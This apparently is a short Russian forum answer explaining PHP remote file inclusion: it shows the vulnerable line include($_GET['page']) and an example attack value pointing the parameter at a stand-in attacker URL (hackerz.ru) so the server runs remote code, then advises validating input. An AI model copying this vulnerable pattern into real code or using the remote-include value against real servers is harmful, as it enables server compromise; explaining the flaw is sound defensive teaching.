Include можно злоупотреблять, если вы делаете что-то вроде этого:
include($_GET["page"]);
, а затем вызывают URL:
myscript.php?page=index.php
злоумышленники могут затем замените index.php
на hxxp://hackerz.ru/install_stuff.php
, и ваш сервер с радостью запустит его.
include
сам совершенно безопасен. Просто убедитесь, что вы всегда проверяете / избегаете ввода.